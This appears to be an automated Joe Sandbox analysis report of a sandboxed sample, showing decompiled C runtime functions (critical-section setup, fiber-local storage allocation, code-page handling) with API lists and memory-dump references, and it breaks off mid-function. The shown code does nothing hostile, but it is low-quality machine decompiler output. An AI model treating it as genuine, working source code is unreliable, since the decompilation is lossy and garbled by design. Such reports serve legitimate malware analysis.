    0x10006bed
    0x10006bed
    0x10006c1f

    APIs
      • Part of subcall function 100068C6: GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000,?,?,?,100051C5), ref: 10006926
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,1BE85006,00000001,?,000000FF), ref: 10006C0B
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C592E7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
    C-Code - Quality: 17%
    			E00C592E7(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				void* _t15;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t15 = __ebx;
				_push(__ecx);
				_t8 =  *0xc6a004; // 0x26d30358
				_v8 = _t8 ^ _t24;
				_t22 = E00C59075(0x14, "InitializeCriticalSectionEx", 0xc64774, 0xc6477c);
				if(_t22 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8); // executed
				} else {
					 *0xc63148(_a4, _a8, _a12);
					 *_t22();
				}
				_pop(_t23);
				return E00C51252(_t15, _v8 ^ _t24, _t20, _t23);
			}











    0x00c592e7
    0x00c592e7
    0x00c592ec
    0x00c592ed
    0x00c592f4
    0x00c5930e
    0x00c59315
    0x00c59332
    0x00c59317
    0x00c59322
    0x00c59328
    0x00c59328
    0x00c5933d
    0x00c59346

    APIs
      • Part of subcall function 00C59075: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
    • InitializeCriticalSectionAndSpinCount.KERNELBASE(?,?,00C56F11), ref: 00C59332
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    • InitializeCriticalSectionEx, xrefs: 00C59302
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 00C5918C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
    C-Code - Quality: 16%
    			E00C5918C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				void* _t11;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t11 = __ebx;
				_push(__ecx);
				_t4 =  *0xc6a004; // 0x26d30358
				_v8 = _t4 ^ _t20;
				_t6 = E00C59075(3, "FlsAlloc", 0xc64738, 0xc64740); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					TlsAlloc();
				} else {
					 *0xc63148(_a4);
					 *_t18();
				}
				_pop(_t19);
				return E00C51252(_t11, _v8 ^ _t20, _t16, _t19);
			}












    0x00c5918c
    0x00c5918c
    0x00c59191
    0x00c59192
    0x00c59199
    0x00c591ae
    0x00c591b3
    0x00c591ba
    0x00c591cb
    0x00c591bc
    0x00c591c1
    0x00c591c7
    0x00c591c7
    0x00c591d6
    0x00c591df

    APIs
      • Part of subcall function 00C59075: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072,00000000), ref: 00C590D5
    • TlsAlloc.KERNEL32 ref: 00C591CB
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 100069DD, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
    C-Code - Quality: 16%
    			E100069DD(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0x1001d018; // 0x26c1db24
				_v8 = _t4 ^ _t18;
				_t6 = E100068C6(3, "FlsAlloc", 0x10016bf8, 0x10016c00); // executed
				_t16 = _t6;
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0x10015138(_a4);
					 *_t16();
				}
				return E10001B26(_v8 ^ _t18);
			}








    0x100069e2
    0x100069e3
    0x100069ea
    0x100069ff
    0x10006a04
    0x10006a0b
    0x10006a1c
    0x10006a0d
    0x10006a12
    0x10006a18
    0x10006a18
    0x10006a30

    APIs
      • Part of subcall function 100068C6: GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000,?,?,?,100051C5), ref: 10006926
    • TlsAlloc.KERNEL32 ref: 10006A1C
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C540B5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
    C-Code - Quality: 68%
    			E00C540B5(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				intOrPtr* _t6;
				intOrPtr* _t10;

				_t6 = E00C53EA6(8, "InitializeCriticalSectionEx", 0xc63360, "InitializeCriticalSectionEx"); // executed
				_t10 = _t6;
				if(_t10 == 0) {
					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
				}
				L00C51C94();
				return  *_t10(_a4, _a8, _a12);
			}





    0x00c540ca
    0x00c540cf
    0x00c540d6
    0x00000000
    0x00c540f2
    0x00c540e3
    0x00000000

    APIs
      • Part of subcall function 00C53EA6: GetProcAddress.KERNEL32(00000000,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34,00C6AD38,00000FA0), ref: 00C53F0A
    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,?), ref: 00C540F2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 10011190, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10
    C-Code - Quality: 100%
    			E10011190(void* __edx, void* __eflags) {
				intOrPtr _t2;
				intOrPtr _t4;

				E100111D0(__eflags);
				_t2 =  *0x1001f2d8; // 0xd1378
				if(_t2 != 0) {
					E10001010(L"%ls\n", _t2);
					_t4 =  *0x1001f2d8; // 0xd1378
					return _t4;
				}
				return _t2;
			}





    0x10011190
    0x10011195
    0x1001119c
    0x100111a4
    0x100111a9
    0x00000000
    0x100111ae
    0x100111b1

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C58DE4, Relevance: 3.2, APIs: 2, Instructions: 168
    C-Code - Quality: 90%
    			E00C58DE4(void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t77;
				signed int _t80;
				signed char* _t81;
				short* _t82;
				int _t86;
				signed char _t87;
				signed int _t88;
				signed int _t90;
				signed int _t91;
				int _t93;
				int _t94;
				intOrPtr _t96;
				signed int _t97;

				_t92 = __edi;
				_t48 =  *0xc6a004; // 0x26d30358
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t77 = E00C589B7(__eflags, _a4);
				if(_t77 != 0) {
					_push(__edi);
					_t93 = 0;
					__eflags = 0;
					_t80 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xc6a2f8)) - _t77;
						if( *((intOrPtr*)(_t51 + 0xc6a2f8)) == _t77) {
							break;
						}
						_t80 = _t80 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t80;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t77 - 0xfde8;
							if(_t77 == 0xfde8) {
								L23:
							} else {
								__eflags = _t77 - 0xfde9;
								if(_t77 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t77 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t77,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xc6b394 - _t93; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00C58A2A(_t96);
												goto L37;
											}
										} else {
											E00C53610(_t93, _t96 + 0x18, _t93, 0x101);
											 *(_t96 + 4) = _t77;
											 *(_t96 + 0x21c) = _t93;
											_t77 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t93;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t72[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L16;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t96 + _t88 + 0x19) =  *(_t96 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t96 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *(_t96 + 0x21c) = E00C58979( *(_t96 + 4));
												 *(_t96 + 8) = _t77;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00C58A8F(_t90, _t96); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t92);
						goto L39;
					}
					E00C53610(_t93, _t96 + 0x18, _t93, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xc6a308;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t81 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t81[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t91 =  *_t81 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t63;
									if(_t91 > _t63) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t31 = _t93 + 0xc6a2f4; // 0x8040201
										 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) |  *_t31;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t63 = _t81[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t81 =  &(_t81[2]);
								__eflags =  *_t81;
								if( *_t81 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t93 = _t93 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t93 - 4;
					} while (_t93 < 4);
					 *(_t96 + 4) = _t77;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E00C58979(_t77);
					_t82 = _t96 + 0xc;
					_t90 = _v36 + 0xc6a2fc;
					_t94 = 6;
					do {
						_t58 =  *_t90;
						_t90 = _t90 + 2;
						 *_t82 = _t58;
						_t82 = _t82 + 2;
						_t94 = _t94 - 1;
						__eflags = _t94;
					} while (_t94 != 0);
					goto L36;
				} else {
					E00C58A2A(_t96);
				}
				L39:
				return E00C51252(_t77, _v8 ^ _t97, _t92, _t96);
			}
































    0x00c58de4
    0x00c58dec
    0x00c58df3
    0x00c58dfb
    0x00c58e03
    0x00c58e08
    0x00c58e18
    0x00c58e19
    0x00c58e19
    0x00c58e1b
    0x00c58e1d
    0x00c58e1f
    0x00c58e22
    0x00c58e22
    0x00c58e28
    0x00000000
    0x00000000
    0x00c58e2e
    0x00c58e2f
    0x00c58e32
    0x00c58e35
    0x00c58e3a
    0x00000000
    0x00c58e3c
    0x00c58e3c
    0x00c58e42
    0x00c58f10
    0x00c58e48
    0x00c58e48
    0x00c58e4e
    0x00000000
    0x00c58e54
    0x00c58e58
    0x00c58e5e
    0x00c58e60
    0x00000000
    0x00c58e66
    0x00c58e6b
    0x00c58e71
    0x00c58e73
    0x00c58efd
    0x00c58f03
    0x00000000
    0x00c58f05
    0x00c58f06
    0x00000000
    0x00c58f06
    0x00c58e79
    0x00c58e83
    0x00c58e88
    0x00c58e90
    0x00c58e96
    0x00c58e97
    0x00c58e9a
    0x00c58eed
    0x00c58e9c
    0x00c58e9c
    0x00c58ea0
    0x00c58ea3
    0x00c58ea5
    0x00c58ea5
    0x00c58ea8
    0x00c58eaa
    0x00000000
    0x00000000
    0x00c58eac
    0x00c58eaf
    0x00c58eba
    0x00c58eba
    0x00c58ebc
    0x00000000
    0x00000000
    0x00c58eb4
    0x00c58eb9
    0x00c58eb9
    0x00c58eb9
    0x00c58ebe
    0x00c58ec1
    0x00c58ec4
    0x00000000
    0x00000000
    0x00000000
    0x00c58ec4
    0x00c58ea5
    0x00c58ec6
    0x00c58ec6
    0x00c58ec9
    0x00c58ece
    0x00c58ece
    0x00c58ed1
    0x00c58ed2
    0x00c58ed2
    0x00c58ed2
    0x00c58ee2
    0x00c58ee8
    0x00c58ee8
    0x00c58ef5
    0x00c58ef6
    0x00c58ef7
    0x00c58fbb
    0x00c58fbc
    0x00c58fc1
    0x00c58fc2
    0x00c58fc2
    0x00c58e73
    0x00c58e60
    0x00c58e4e
    0x00c58e42
    0x00c58fc4
    0x00000000
    0x00c58fc4
    0x00c58f22
    0x00c58f2a
    0x00c58f2a
    0x00c58f2e
    0x00c58f31
    0x00c58f37
    0x00c58f3a
    0x00c58f3a
    0x00c58f3d
    0x00c58f3f
    0x00c58f41
    0x00c58f41
    0x00c58f44
    0x00c58f46
    0x00000000
    0x00000000
    0x00c58f48
    0x00c58f4b
    0x00c58f67
    0x00c58f67
    0x00c58f69
    0x00000000
    0x00000000
    0x00c58f50
    0x00c58f56
    0x00c58f58
    0x00c58f5e
    0x00c58f62
    0x00c58f62
    0x00c58f63
    0x00000000
    0x00c58f63
    0x00000000
    0x00c58f56
    0x00c58f6b
    0x00c58f6e
    0x00c58f71
    0x00000000
    0x00000000
    0x00000000
    0x00c58f71
    0x00c58f73
    0x00c58f73
    0x00c58f76
    0x00c58f77
    0x00c58f7a
    0x00c58f7d
    0x00c58f7d
    0x00c58f83
    0x00c58f86
    0x00c58f95
    0x00c58f9e
    0x00c58fa3
    0x00c58fa9
    0x00c58faa
    0x00c58faa
    0x00c58fad
    0x00c58fb0
    0x00c58fb3
    0x00c58fb6
    0x00c58fb6
    0x00c58fb6
    0x00000000
    0x00c58e0a
    0x00c58e0b
    0x00c58e11
    0x00c58fc5
    0x00c58fd4

    APIs
      • Part of subcall function 00C589B7: GetOEMCP.KERNEL32(00000000), ref: 00C589E2
      • Part of subcall function 00C589B7: GetACP.KERNEL32(00000000), ref: 00C589F9
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00C58C85,?,00000000), ref: 00C58E58
    • GetCPInfo.KERNEL32(00000000,00C58C85,?,?,?,00C58C85,?,00000000), ref: 00C58E6B
      • Part of subcall function 00C58A8F: GetCPInfo.KERNEL32(?,?), ref: 00C58AB4
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    Function 1000978C, Relevance: 3.2, APIs: 2, Instructions: 168
    C-Code - Quality: 92%
    			E1000978C(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x1001d018; // 0x26c1db24
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = E1000935F(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x1001d200)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x1001d200)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t78,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x1001f1cc - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E100093D2(_t98);
												goto L37;
											}
										} else {
											E10001E90(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E10009321( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E10009437(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E10001E90(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0x1001d210;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0x1001d1f8; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E10009321(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0x1001d204;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E100093D2(_t98);
				}
				L39:
				return E10001B26(_v8 ^ _t99);
			}






























    0x10009794
    0x1000979b
    0x100097a3
    0x100097ab
    0x100097b0
    0x100097c1
    0x100097c1
    0x100097c3
    0x100097c5
    0x100097c7
    0x100097ca
    0x100097ca
    0x100097d0
    0x00000000
    0x00000000
    0x100097d6
    0x100097d7
    0x100097da
    0x100097dd
    0x100097e2
    0x00000000
    0x100097e4
    0x100097e4
    0x100097ea
    0x100098b8
    0x100097f0
    0x100097f0
    0x100097f6
    0x00000000
    0x100097fc
    0x10009800
    0x10009806
    0x10009808
    0x00000000
    0x1000980e
    0x10009813
    0x10009819
    0x1000981b
    0x100098a5
    0x100098ab
    0x00000000
    0x100098ad
    0x100098ae
    0x00000000
    0x100098ae
    0x10009821
    0x1000982b
    0x10009830
    0x10009838
    0x1000983e
    0x1000983f
    0x10009842
    0x10009895
    0x10009844
    0x10009844
    0x10009848
    0x1000984b
    0x1000984d
    0x1000984d
    0x10009850
    0x10009852
    0x00000000
    0x00000000
    0x10009854
    0x10009857
    0x10009862
    0x10009862
    0x10009864
    0x00000000
    0x00000000
    0x1000985c
    0x10009861
    0x10009861
    0x10009861
    0x10009866
    0x10009869
    0x1000986c
    0x00000000
    0x00000000
    0x00000000
    0x1000986c
    0x1000984d
    0x1000986e
    0x1000986e
    0x10009871
    0x10009876
    0x10009876
    0x10009879
    0x1000987a
    0x1000987a
    0x1000987a
    0x1000988a
    0x10009890
    0x10009890
    0x1000989a
    0x1000989d
    0x1000989e
    0x1000989f
    0x10009963
    0x10009964
    0x10009969
    0x1000996a
    0x1000996a
    0x1000981b
    0x10009808
    0x100097f6
    0x100097ea
    0x00000000
    0x1000996c
    0x100098ca
    0x100098d2
    0x100098d2
    0x100098d6
    0x100098d9
    0x100098df
    0x100098e2
    0x100098e2
    0x100098e5
    0x100098e7
    0x100098e9
    0x100098e9
    0x100098ec
    0x100098ee
    0x00000000
    0x00000000
    0x100098f0
    0x100098f3
    0x1000990f
    0x1000990f
    0x10009911
    0x00000000
    0x00000000
    0x100098f8
    0x100098fe
    0x10009900
    0x10009906
    0x1000990a
    0x1000990a
    0x1000990b
    0x00000000
    0x1000990b
    0x00000000
    0x100098fe
    0x10009913
    0x10009916
    0x10009919
    0x00000000
    0x00000000
    0x00000000
    0x10009919
    0x1000991b
    0x1000991b
    0x1000991e
    0x1000991f
    0x10009922
    0x10009925
    0x10009925
    0x1000992b
    0x1000992e
    0x1000993d
    0x10009946
    0x1000994b
    0x10009951
    0x10009952
    0x10009952
    0x10009955
    0x10009958
    0x1000995b
    0x1000995e
    0x1000995e
    0x1000995e
    0x00000000
    0x100097b2
    0x100097b3
    0x100097b9
    0x1000996d
    0x1000997c

    APIs
      • Part of subcall function 1000935F: GetOEMCP.KERNEL32(00000000,?,?,100095E8,?), ref: 1000938A
      • Part of subcall function 1000935F: GetACP.KERNEL32(00000000,?,?,100095E8,?), ref: 100093A1
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,1000962D,?,00000000), ref: 10009800
    • GetCPInfo.KERNEL32(00000000,1000962D,?,?,?,1000962D,?,00000000), ref: 10009813
      • Part of subcall function 10009437: GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 1000945C
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    Function 00C60520, Relevance: 3.1, APIs: 2, Instructions: 118
    C-Code - Quality: 76%
    			E00C60520(void* __edx, intOrPtr* _a8) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v68;
				intOrPtr _v196;
				char _v380;
				intOrPtr _v384;
				intOrPtr* _v388;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t45;
				signed int _t46;
				void* _t48;
				void* _t49;
				void* _t54;
				void* _t57;
				intOrPtr _t58;
				void* _t69;
				void* _t70;
				char* _t72;
				void* _t85;
				intOrPtr* _t87;
				void* _t88;
				signed int _t89;
				void* _t90;
				intOrPtr _t91;
				void* _t92;

				_push(0xfffffffe);
				_push(0xc69078);
				_push(E00C53330);
				_push( *[fs:0x0]);
				_t91 = _t90 - 0x174;
				_t45 =  *0xc6a004; // 0x26d30358
				_v12 = _v12 ^ _t45;
				_t46 = _t45 ^ _t89;
				_v32 = _t46;
				_push(_t46);
				 *[fs:0x0] =  &_v20;
				_v28 = _t91;
				_t69 = __edx;
				_t87 = _a8;
				_v388 = _t87;
				_v384 = 0;
				_v68 = 0;
				_v48 = 0;
				_v40 = 0;
				_v44 = 0;
				_v36 = 0;
				_v8 = 0;
				_v8 = 1;
				_t48 = E00C60D90( &_v380, __edx);
				_t92 = _t91 + 4;
				if(_t48 == 0) {
					_t72 =  &_v380;
					_t49 = E00C60CD0(_t72); // executed
					if(_t49 != 0) {
						goto L1;
					} else {
						_v8 = 2;
						_push(_t72);
						_t54 = E00C60BB0( &_v380, _t69);
						_t92 = _t92 + 8;
						if(_t54 != 0 || E00C60A70( &_v380) != 0 || E00C608F0( &_v380) != 0) {
							goto L1;
						} else {
							_t57 = E00C60830( &_v380); // executed
							if(_t57 != 0) {
								goto L1;
							} else {
								_t58 = E00C60790( &_v380); // executed
								if(_t58 != 0) {
									goto L1;
								} else {
									if(_t87 != 0) {
